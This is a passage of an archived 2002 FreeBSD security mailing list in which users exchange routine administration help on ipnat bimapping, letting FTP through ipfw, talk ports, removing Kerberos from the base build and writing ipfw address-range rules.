PHRyIGhlaWdodD0iNiI+IDwvdHI+DQogIDwvdGFibGU+DQogIDxmb250IGZhY2U9IkFyaWFsLCBI ZWx2ZXRpY2EsIHNhbnMtc2VyaWYiIGNvbG9yPSIjNjY2NjY2IiBzaXplPSIyIj5Db3B5cmlnaHQg JmNvcHk7IA0KICAyMDAwLCBHTE9CQUwyMDAwLkNPTTwvZm9udD48L2Rpdj4NCjwvQk9EWT48L0hU TUw+DQoNCltpaXc3SWlVLW1YY2Z3QUJWay1xQ1RvalRobHJQdURuXQ0KDQo= To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 10 3:27:44 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.npubs.com (npubs.com [207.111.208.224]) by hub.freebsd.org (Postfix) with ESMTP id C3B5737B405 for ; Fri, 10 May 2002 03:27:41 -0700 (PDT) Received: 8.12.2-(Neptune) Received: 8.12.2-(Venus) Received: 8.12.2-(Neptune) From: "Nielsen" To: References: <3CDA988D.34E2148C@centtech.com> <20020509170045.5584B37B414@hub.freebsd.org> <3CDAB25B.4B228C1B@centtech.com> Subject: Re: ipnat and bimapping MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Message-Id: <20020510102741.C3B5737B405@hub.freebsd.org> Date: Fri, 10 May 2002 03:27:41 -0700 (PDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org It looks right, and I've done something like that before. But you'd have to give it a shot to be sure. Hope it works out. Nate > bimap sis0 10.10.20.2/32 -> 24.24.24.1/32 > > map sis0 10.10.10.0/24 -> 24.24.24.1/32 portmap tcp/udp 40000:65000 > map sis0 10.10.10.0/24 -> 24.24.24.1/32 > map sis0 10.10.20.0/24 -> 24.24.24.1/32 portmap tcp/udp 40000:65000 > map sis0 10.10.20.0/24 -> 24.24.24.1/32 > > map sis0 0.0.0.0/32 -> 0.0.0.0/32 proxy port 21 ftp/tcp To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 10 4:53:36 2002 Delivered-To: freebsd-security@freebsd.org Received: from maile.telia.com (maile.telia.com [194.22.190.16]) by hub.freebsd.org (Postfix) with ESMTP id 0BA6D37B403 for ; Fri, 10 May 2002 04:53:32 -0700 (PDT) Received: from d1o1108.telia.com (d1o1108.telia.com [217.209.148.241]) by maile.telia.com (8.11.6/8.11.6) with ESMTP id g4ABrU411156 for ; Fri, 10 May 2002 13:53:30 +0200 (CEST) Received: from insomnia (h51n2fls35o1108.telia.com [217.210.163.51]) by d1o1108.telia.com (8.10.2/8.10.1) with SMTP id g4ABrTm02591 for ; Fri, 10 May 2002 13:53:29 +0200 (CEST) Message-ID: <006601c1f81a$711452c0$fe00a8c0@insomnia> From: "Nils Nordell" To: References: <00f701c1f781$b77478b0$6e2a6ba5@lc.ca.gov> Subject: Re: Allowing FTP Through *My* IPFW Firewall Date: Fri, 10 May 2002 14:01:38 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4807.1700 X-MIMEOLE: Produced By Microsoft MimeOLE V5.50.4807.1700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Are you running natd on the machine with the ADSL modem? Then you could use the option "punch_fw" in /etc/natd.conf. Punch_fw creates temporary firewall rules allowing ftp and irc without trouble on the machines behind the firewall. / Nils ----- Original Message ----- From: "Drew Tomlinson" To: Sent: Thursday, May 09, 2002 7:48 PM Subject: Allowing FTP Through *My* IPFW Firewall > I'm trying to figure out what rule I need to add or change to allow ftp > sessions to pass through my ipfw firewall. I have search the archives > but the only conclusions I have found is that this is a difficult task > because of the nature of ftp. I'm hoping someone can help me with my > specific situation. > > Here is how my home network is configured: > > ISP > | > | Public DHCP address > | > 3Com ADSL Modem/Router > (Router performs NAT and passes packets to 10.2 by default) > | (192.168.10.1) > | > | > | (ed1 192.168.10.2) > FBSD Gateway > | (ed0 192.168.1.2) > | > | > Internal LAN > > > These are my current firewall rules: > > blacksheep# ipfw list > 00100 allow ip from any to any via lo0 > 00200 deny log ip from any to 127.0.0.0/8 > 00300 deny log ip from 192.168.1.0/24 to any in recv ed1 > 00400 deny log ip from not 192.168.1.0/24 to any in recv ed0 > 00500 check-state > 00600 allow tcp from 192.168.1.0/24 > 21,22,25,80,143,389,443,993,5405,10001 to any established > 00700 allow tcp from any to 192.168.1.0/24 > 21,22,25,80,143,389,443,993,5405,10001 > 00800 allow tcp from 192.168.10.2 to any 21,22,8021 established > 00900 allow tcp from any to 192.168.10.2 21,22,8021 > 01000 allow icmp from any to any icmptype 3,4,11,12 > 01100 allow icmp from any to any out icmptype 8 > 01200 allow icmp from any to any in icmptype 0 > 01300 reset log tcp from any to any 113 > 01400 allow udp from 206.13.19.133 123 to 192.168.10.2 123 > 01500 allow udp from 165.227.1.1 123 to 192.168.10.2 123 > 01600 allow udp from 63.192.96.2 123 to 192.168.10.2 123 > 01700 allow udp from 63.192.96.3 123 to 192.168.10.2 123 > 01800 allow udp from 132.239.254.49 123 to 192.168.10.2 123 > 01900 allow udp from 192.168.10.1 to any > 02000 allow udp from any to 192.168.10.1 > 02100 allow ip from 192.168.10.2 to any keep-state out xmit ed1 > 02200 allow ip from 192.168.1.0/24 to any keep-state via ed0 > 65500 deny log ip from any to any > > An FTP client on the outside can establish as session and login through > the firewall but fails when the first data transfer (listing the remote > directory) begins. Here is a sample entry from my security log: > > May 9 09:56:57 blacksheep /kernel: ipfw: 65500 Deny TCP > 207.173.226.108:2191 192.168.1.4:49172 in via ed1 > > Any help would be appreciated. > > Thanks, > > Drew > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 10 5:35:20 2002 Delivered-To: freebsd-security@freebsd.org Received: from blacklamb.mykitchentable.net (ekgr-dsl2-01.citlink.net [207.173.226.1]) by hub.freebsd.org (Postfix) with ESMTP id 9BE0D37B405 for ; Fri, 10 May 2002 05:35:12 -0700 (PDT) Received: from bigdaddy (bigdaddy [192.168.1.3]) by blacklamb.mykitchentable.net (Postfix) with SMTP id A525EEE644 for ; Fri, 10 May 2002 05:35:11 -0700 (PDT) Message-ID: <003f01c1f81f$208dc0c0$0301a8c0@bigdaddy> From: "Drew Tomlinson" To: References: <00f701c1f781$b77478b0$6e2a6ba5@lc.ca.gov> <006601c1f81a$711452c0$fe00a8c0@insomnia> Subject: Re: Allowing FTP Through *My* IPFW Firewall Date: Fri, 10 May 2002 05:35:11 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org ----- Original Message ----- From: "Nils Nordell" Sent: Friday, May 10, 2002 5:01 AM > Are you running natd on the machine with the ADSL modem? > Then you could use the option "punch_fw" in /etc/natd.conf. > Punch_fw creates temporary firewall rules allowing ftp and irc > without trouble on the machines behind the firewall. No. The 3Com ADSL Modem/Router is not a FBSD box nor is it even a PC. It's a special purpose device running a proprietary OS, kind of like a LinkSys, Netgear, or DLink router with a ADSL modem built in. Thanks for your response! Drew > / Nils > ----- Original Message ----- > From: "Drew Tomlinson" > To: > Sent: Thursday, May 09, 2002 7:48 PM > Subject: Allowing FTP Through *My* IPFW Firewall > > > > I'm trying to figure out what rule I need to add or change to allow ftp > > sessions to pass through my ipfw firewall. I have search the archives > > but the only conclusions I have found is that this is a difficult task > > because of the nature of ftp. I'm hoping someone can help me with my > > specific situation. > > > > Here is how my home network is configured: > > > > ISP > > | > > | Public DHCP address > > | > > 3Com ADSL Modem/Router > > (Router performs NAT and passes packets to 10.2 by default) > > | (192.168.10.1) > > | > > | > > | (ed1 192.168.10.2) > > FBSD Gateway > > | (ed0 192.168.1.2) > > | > > | > > Internal LAN > > > > > > These are my current firewall rules: > > > > blacksheep# ipfw list > > 00100 allow ip from any to any via lo0 > > 00200 deny log ip from any to 127.0.0.0/8 > > 00300 deny log ip from 192.168.1.0/24 to any in recv ed1 > > 00400 deny log ip from not 192.168.1.0/24 to any in recv ed0 > > 00500 check-state > > 00600 allow tcp from 192.168.1.0/24 > > 21,22,25,80,143,389,443,993,5405,10001 to any established > > 00700 allow tcp from any to 192.168.1.0/24 > > 21,22,25,80,143,389,443,993,5405,10001 > > 00800 allow tcp from 192.168.10.2 to any 21,22,8021 established > > 00900 allow tcp from any to 192.168.10.2 21,22,8021 > > 01000 allow icmp from any to any icmptype 3,4,11,12 > > 01100 allow icmp from any to any out icmptype 8 > > 01200 allow icmp from any to any in icmptype 0 > > 01300 reset log tcp from any to any 113 > > 01400 allow udp from 206.13.19.133 123 to 192.168.10.2 123 > > 01500 allow udp from 165.227.1.1 123 to 192.168.10.2 123 > > 01600 allow udp from 63.192.96.2 123 to 192.168.10.2 123 > > 01700 allow udp from 63.192.96.3 123 to 192.168.10.2 123 > > 01800 allow udp from 132.239.254.49 123 to 192.168.10.2 123 > > 01900 allow udp from 192.168.10.1 to any > > 02000 allow udp from any to 192.168.10.1 > > 02100 allow ip from 192.168.10.2 to any keep-state out xmit ed1 > > 02200 allow ip from 192.168.1.0/24 to any keep-state via ed0 > > 65500 deny log ip from any to any > > > > An FTP client on the outside can establish as session and login through > > the firewall but fails when the first data transfer (listing the remote > > directory) begins. Here is a sample entry from my security log: > > > > May 9 09:56:57 blacksheep /kernel: ipfw: 65500 Deny TCP > > 207.173.226.108:2191 192.168.1.4:49172 in via ed1 > > > > Any help would be appreciated. > > > > Thanks, > > > > Drew > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 10 6:41:25 2002 Delivered-To: freebsd-security@freebsd.org Received: from vortex.wa4phy.net (pcp01578187pcs.martnz01.ga.comcast.net [68.47.5.16]) by hub.freebsd.org (Postfix) with ESMTP id 7C83337B407 for ; Fri, 10 May 2002 06:41:17 -0700 (PDT) Received: from vortex.wa4phy.net (localhost.wa4phy.net [127.0.0.1]) by vortex.wa4phy.net (8.11.6/8.11.6) with ESMTP id g4ADfGi07654 for ; Fri, 10 May 2002 09:41:16 -0400 (EDT) (envelope-from sam@wa4phy.net) Message-ID: <3CDBCDFC.75062339@vortex.wa4phy.net> Date: Fri, 10 May 2002 09:41:16 -0400 From: Sam Drinkard Organization: You Gotta Be Kiddin! X-Mailer: Mozilla 4.76 [en] (X11; U; FreeBSD 4.5-STABLE i386) X-Accept-Language: en, ja MIME-Version: 1.0 To: security@freebsd.org Subject: Second request Talk ports/sockets Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Since tightening up the firewall, my talk (from internal, not network) is broken. I can't seem to figure out what ucp/tcp port(s) to open to allow the talk utility to work. Looking at the source code didn't help much either, but reference to sockets was mentioned. Once a user logs in, does the talk utility not use the localhost address for connections? Hints? Thanks.. Sam To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 10 8:41:13 2002 Delivered-To: freebsd-security@freebsd.org Received: from sub21-156.member.dsl-only.net (sub21-156.member.dsl-only.net [63.105.21.156]) by hub.freebsd.org (Postfix) with ESMTP id 0DAFB37B403 for ; Fri, 10 May 2002 08:41:08 -0700 (PDT) Received: from sub21-156.member.dsl-only.net (freebsd.localhost.localdomain [127.0.0.1]) by sub21-156.member.dsl-only.net (8.11.6/8.11.6) with SMTP id g4AFkrp76185; Fri, 10 May 2002 08:47:06 -0700 (PDT) (envelope-from nkinkade@dsl-only.com) Date: Fri, 10 May 2002 08:46:53 -0700 From: Nathan Kinkade To: Sam Drinkard Cc: security@freebsd.org Subject: Re: Second request Talk ports/sockets Message-Id: <20020510084653.51d1ba8e.nkinkade@dsl-only.com> In-Reply-To: <3CDBCDFC.75062339@vortex.wa4phy.net> References: <3CDBCDFC.75062339@vortex.wa4phy.net> X-Mailer: Sylpheed version 0.7.4claws (GTK+ 1.2.10; i386-portbld-freebsd4.5) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, 10 May 2002 09:41:16 -0400 Sam Drinkard wrote: > Since tightening up the firewall, my talk (from internal, not network) > is broken. I can't seem to figure out what ucp/tcp port(s) to open to > allow the talk utility to work. Looking at the source code didn't > help much either, but reference to sockets was mentioned. Once a user > logs in, does the talk utility not use the localhost address for > connections? The port for talk is 517. The port for ntalk is 518. I first found this out by launching ethereal (a network protocol analyzer that's in the ports collection). Then I attempted to launch a talk session with a non-existent host just to see some traffic. A quick review of the captured packets showed that my machine was attempting to communicate using ntalk on UDP port 518. I then did a quick search on Google for 'ntalk tcp port number'. The very first returned hit revealed the following. talk 517/tcp like tenex link, but across # machine - unfortunately, doesn't # use link protocol (this is actually # just a rendezvous port from which a # tcp connection is established) talk 517/udp like tenex link, but across # machine - unfortunately, doesn't # use link protocol (this is actually # just a rendezvous port from which a # tcp connection is established) ntalk 518/tcp ntalk 518/udp Further, a quick browse through /etc/services revealed exactly the same text as above. Presumably that's where the site got the information in the first place. There are plenty of ways to figure out information like this....it just requires that you think about it for a minute. The Google search engine is invaluable...and then again, as demonstrated above, often the info lies right on your own computer. Hope this helps. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 10 8:51: 1 2002 Delivered-To: freebsd-security@freebsd.org Received: from alfanett.no (mail1.alfanett.no [195.134.40.22]) by hub.freebsd.org (Postfix) with ESMTP id A7A7237B407 for ; Fri, 10 May 2002 08:50:57 -0700 (PDT) Received: from goppus.overalt.no (kunde1323.alfanett.no [195.134.38.54]) by alfanett.no (8.9.3/8.9.3/alfaNETT1.0) with ESMTP id RAA08887 for ; Fri, 10 May 2002 17:50:56 +0200 Date: Fri, 10 May 2002 17:52:03 +0200 From: Marius Sorteberg To: freebsd-security@FreeBSD.ORG Subject: How to remove Kerberos from base install Message-ID: <20020510093809.GA368@overalt.no> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Disposition: inline User-Agent: Mutt/1.3.28i X-UID: 49 Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi list. How do I remove KerberosIV and Heimdal from my base install? I know it's OK to delete all files related to the old Kerberos apps, but how do I know witch files do delete? I have included this in my /etc/make.conf, so it wount be build during the next make world. MAKE_KERBEROS4= false MAKE_KERBEROS5= false Regards Marius Sorteberg To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 10 9:25:43 2002 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by hub.freebsd.org (Postfix) with ESMTP id 4DA1737B409 for ; Fri, 10 May 2002 09:25:37 -0700 (PDT) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id BE31043; Fri, 10 May 2002 11:25:36 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.11.6) with ESMTP id g4AGPar7052262; Fri, 10 May 2002 11:25:36 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g4AGPZgI052261; Fri, 10 May 2002 11:25:35 -0500 (CDT) Date: Fri, 10 May 2002 11:25:35 -0500 From: "Jacques A. Vidrine" To: Marius Sorteberg Cc: freebsd-security@FreeBSD.ORG Subject: Re: How to remove Kerberos from base install Message-ID: <20020510162535.GA52239@madman.nectar.cc> Mail-Followup-To: "Jacques A. Vidrine" , Marius Sorteberg , freebsd-security@FreeBSD.ORG References: <20020510093809.GA368@overalt.no> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020510093809.GA368@overalt.no> User-Agent: Mutt/1.3.28i X-Url: http://www.nectar.cc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, May 10, 2002 at 05:52:03PM +0200, Marius Sorteberg wrote: > Hi list. > > How do I remove KerberosIV and Heimdal from my base install? > I know it's OK to delete all files related to the old Kerberos apps, but how > do I know witch files do delete? I have two suggestions: (1) Have a look at what is installed by cd /usr/src/kerberosIV && make install cd /usr/src/kerberos5 && make install (2) Look at the contents of the krb4 and krb5 dists on the CD-ROM. > I have included this in my /etc/make.conf, so it wount be build during the > next make world. > > MAKE_KERBEROS4= false > MAKE_KERBEROS5= false I suggest you comment these out. These bits are only built if you define MAKE_KERBEROS4=yes and MAKE_KERBEROS5=yes in /etc/make.conf. Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 10 16:50:49 2002 Delivered-To: freebsd-security@freebsd.org Received: from alfanett.no (mail1.alfanett.no [195.134.40.22]) by hub.freebsd.org (Postfix) with ESMTP id A35BF37B409; Fri, 10 May 2002 16:50:42 -0700 (PDT) Received: from goppus.overalt.no (kunde1323.alfanett.no [195.134.38.54]) by alfanett.no (8.9.3/8.9.3/alfaNETT1.0) with ESMTP id BAA23639; Sat, 11 May 2002 01:50:36 +0200 Content-Type: text/plain; charset="iso-8859-1" From: Marius Sorteberg Reply-To: marius@overalt.no To: "Jacques A. Vidrine" Subject: Re: How to remove Kerberos from base install Date: Sat, 11 May 2002 01:51:44 +0200 X-Mailer: KMail [version 1.4] Cc: freebsd-security@FreeBSD.ORG References: <20020510093809.GA368@overalt.no> <20020510162535.GA52239@madman.nectar.cc> In-Reply-To: <20020510162535.GA52239@madman.nectar.cc> MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: <200205110151.44504.marius@overalt.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Thanks for your reply. > > How do I remove KerberosIV and Heimdal from my base install? > > I know it's OK to delete all files related to the old Kerberos apps, but > > how do I know witch files do delete? > > I have two suggestions: > > (1) Have a look at what is installed by > cd /usr/src/kerberosIV && make install > cd /usr/src/kerberos5 && make install > OK! I will try that to morrow. > (2) Look at the contents of the krb4 and krb5 dists on the CD-ROM. > OK! I'll compare that too. > > I have included this in my /etc/make.conf, so it wount be build during > > the next make world. > > > > MAKE_KERBEROS4= false > > MAKE_KERBEROS5= false > > I suggest you comment these out. These bits are only built if you > define MAKE_KERBEROS4=yes and MAKE_KERBEROS5=yes in /etc/make.conf. Are you sure? I tought that the "#NOCRYPT= true" in the /etc/defaults/make.conf, made the build world make all the src/crypto apps (including Kerberos). I tought that when not comment out the "NOCRYPT= true", but add "MAKE_KERBEROS(5)4= false", it would build OpenSSL and OpenSSH, but not KerberosVI and Heimdal. I'll report back to the list after doing some tests. -- Marius Sorteberg To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri May 10 22:23: 7 2002 Delivered-To: freebsd-security@freebsd.org Received: from math.teaser.net (math.teaser.net [213.91.2.4]) by hub.freebsd.org (Postfix) with ESMTP id AAD1A37B40A for ; Fri, 10 May 2002 22:23:03 -0700 (PDT) Received: from roadrunner.rominet.net (ATuileries-109-1-2-47.abo.wanadoo.fr [80.13.122.47]) by math.teaser.net (Postfix) with ESMTP id 347C06C85A; Sat, 11 May 2002 07:23:02 +0200 (CEST) Received: by roadrunner.rominet.net (Postfix, from userid 1000) id 652CB8167; Sat, 11 May 2002 07:23:00 +0200 (CEST) Date: Sat, 11 May 2002 07:23:00 +0200 From: Alain Thivillon To: Naughty Taz Cc: freebsd-security@freebsd.org Subject: Re: IPFW and IP/mask mathematics Message-ID: <20020511052300.GA22841@roadrunner.rominet.net> References: <001e01c1f79e$78612390$626a003e@homepc> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 8bit In-Reply-To: <001e01c1f79e$78612390$626a003e@homepc> User-Agent: Mutt/1.3.24i X-Organization: Rominet Networks Inc. X-Operating-System: FreeBSD 4.5-STABLE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Naughty Taz écrivait (wrote) : > Hi all, > > I've been trying to get a ruleset for IPFW but was unable to figure out > how to do it :( > I'd appreciate it if someone can reply with the right ruleset for the > following: > > 1) allow traffic from 0.0.0.0 - XXX.128.0.0 > 2) block traffic from XXX.128.0.0 - XXX.146.159.255 ipfw add deny all from xxx.128.0.0/12 to any ipfw add deny all from xxx.144.0.0/15 to any ipfw add deny all from xxx.146.0.0/16 to any ipfw add allow all from any to any -- Nom d'un chat de nom d'un chat ! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 11 13:38: 5 2002 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (f102.pav2.hotmail.com [64.4.37.102]) by hub.freebsd.org (Postfix) with ESMTP id 5CE2D37B408 for ; Sat, 11 May 2002 13:38:02 -0700 (PDT) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Sat, 11 May 2002 13:38:02 -0700 Received: from 202.41.224.36 by pv2fd.pav2.hotmail.msn.com with HTTP; Sat, 11 May 2002 20:38:01 GMT X-Originating-IP: [202.41.224.36] From: "Sunil Sunder Raj" To: freebsd-security@freebsd.org Subject: POSTFIX RELAY SERVER ON FREEBSD Date: Sun, 12 May 2002 02:08:01 +0530 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 11 May 2002 20:38:02.0296 (UTC) FILETIME=[BECADB80:01C1F92B] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, Could some one help me out on POSTFIX RELAY SERVER ON FREEBSD. I am almost through but some small hickups. Could someone having an experience help me out. THANKS IN ADVANCE. SUNIL SUNDER RAJ _________________________________________________________________ Chat with friends online, try MSN Messenger: http://messenger.msn.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 11 14: 8: 8 2002 Delivered-To: freebsd-security@freebsd.org Received: from rwcrmhc51.attbi.com (rwcrmhc51.attbi.com [204.127.198.38]) by hub.freebsd.org (Postfix) with ESMTP id 8C39737B404; Sat, 11 May 2002 14:08:00 -0700 (PDT) Received: from blossom.cjclark.org ([12.234.91.48]) by rwcrmhc51.attbi.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with ESMTP id <20020511210800.WLTD10136.rwcrmhc51.attbi.com@blossom.cjclark.org>; Sat, 11 May 2002 21:08:00 +0000 Received: (from cjc@localhost) by blossom.cjclark.org (8.11.6/8.11.6) id g4BL7xL09378; Sat, 11 May 2002 14:07:59 -0700 (PDT) (envelope-from cjc) Date: Sat, 11 May 2002 14:07:59 -0700 From: "Crist J. Clark" To: Marius Sorteberg Cc: "Jacques A. Vidrine" , freebsd-security@FreeBSD.org Subject: Re: How to remove Kerberos from base install Message-ID: <20020511140759.B2824@blossom.cjclark.org> References: <20020510093809.GA368@overalt.no> <20020510162535.GA52239@madman.nectar.cc> <200205110151.44504.marius@overalt.no> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200205110151.44504.marius@overalt.no>; from marius@overalt.no on Sat, May 11, 2002 at 01:51:44AM +0200 X-URL: http://people.freebsd.org/~cjc/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sat, May 11, 2002 at 01:51:44AM +0200, Marius Sorteberg wrote: [snip] > > > I have included this in my /etc/make.conf, so it wount be build during > > > the next make world. > > > > > > MAKE_KERBEROS4= false > > > MAKE_KERBEROS5= false > > > > I suggest you comment these out. These bits are only built if you > > define MAKE_KERBEROS4=yes and MAKE_KERBEROS5=yes in /etc/make.conf. > > Are you sure? I tought that the "#NOCRYPT= true" in the > /etc/defaults/make.conf, made the build world make all the src/crypto apps > (including Kerberos). > I tought that when not comment out the "NOCRYPT= true", but add > "MAKE_KERBEROS(5)4= false", it would build OpenSSL and OpenSSH, but not > KerberosVI and Heimdal. No, don't define 'MAKE_KERBEROS[45]' at all. Here is the makefile logic in src/Makefile.inc, .if exists(${.CURDIR}/kerberosIV) && exists(${.CURDIR}/crypto) && \ !defined(NOCRYPT) && !defined(NO_OPENSSL) && defined(MAKE_KERBEROS4) SUBDIR+= kerberosIV .endif .if exists(${.CURDIR}/kerberos5) && exists(${.CURDIR}/crypto) && \ !defined(NOCRYPT) && !defined(NO_OPENSSL) && defined(MAKE_KERBEROS5) SUBDIR+= kerberos5 .endif -- Crist J. Clark | cjclark@alum.mit.edu | cjclark@jhu.edu http://people.freebsd.org/~cjc/ | cjc@freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 11 15:27:53 2002 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-63-207-60-43.dsl.lsan03.pacbell.net [63.207.60.43]) by hub.freebsd.org (Postfix) with ESMTP id 490D937B405 for ; Sat, 11 May 2002 15:27:46 -0700 (PDT) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 9941D66DC8; Sat, 11 May 2002 15:27:45 -0700 (PDT) Date: Sat, 11 May 2002 15:27:45 -0700 From: Kris Kennaway To: Sunil Sunder Raj Cc: freebsd-security@freebsd.org Subject: Re: POSTFIX RELAY SERVER ON FREEBSD Message-ID: <20020511152745.A59844@xor.obsecurity.org> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: ; from unixtools@hotmail.com on Sun, May 12, 2002 at 02:08:01AM +0530 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sun, May 12, 2002 at 02:08:01AM +0530, Sunil Sunder Raj wrote: > Hi, > Could some one help me out on POSTFIX RELAY SERVER ON FREEBSD. > I am almost through but some small hickups. > > Could someone having an experience help me out. COULD YOU PLEASE BE A BIT LESS SPECIFIC ABOUT YOUR QUESTION AND POST IT TO SOME MORE OFF-TOPIC MAILING LISTS WHILE YOU'RE AT IT. THANKS. Kris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 11 15:34:17 2002 Delivered-To: freebsd-security@freebsd.org Received: from mgw1-out.MEIway.com (mgw1.meiway.com [212.73.210.75]) by hub.freebsd.org (Postfix) with ESMTP id EA5B237B404 for ; Sat, 11 May 2002 15:34:12 -0700 (PDT) Received: from VirusGate.MEIway.com (virus-gate.meiway.com [212.73.210.91]) by mgw1-out.MEIway.com (Postfix Relay Hub) with ESMTP id 103BB38B9F for ; Sun, 12 May 2002 00:34:11 +0200 (CEST) Received: from localhost (localhost.meiway.com [127.0.0.1]) by VirusGate.MEIway.com (Postfix) with SMTP id 29C645D005 for ; Sun, 12 May 2002 00:34:17 +0200 (CEST) Received: from mail.Go2France.com (ms1.meiway.com [212.73.210.73]) by VirusGate.MEIway.com (Postfix) with ESMTP id C35AD5D001 for ; Sun, 12 May 2002 00:34:16 +0200 (CEST) Received: from LenConrad.Go2France.com [66.64.14.18] by mail.Go2France.com with 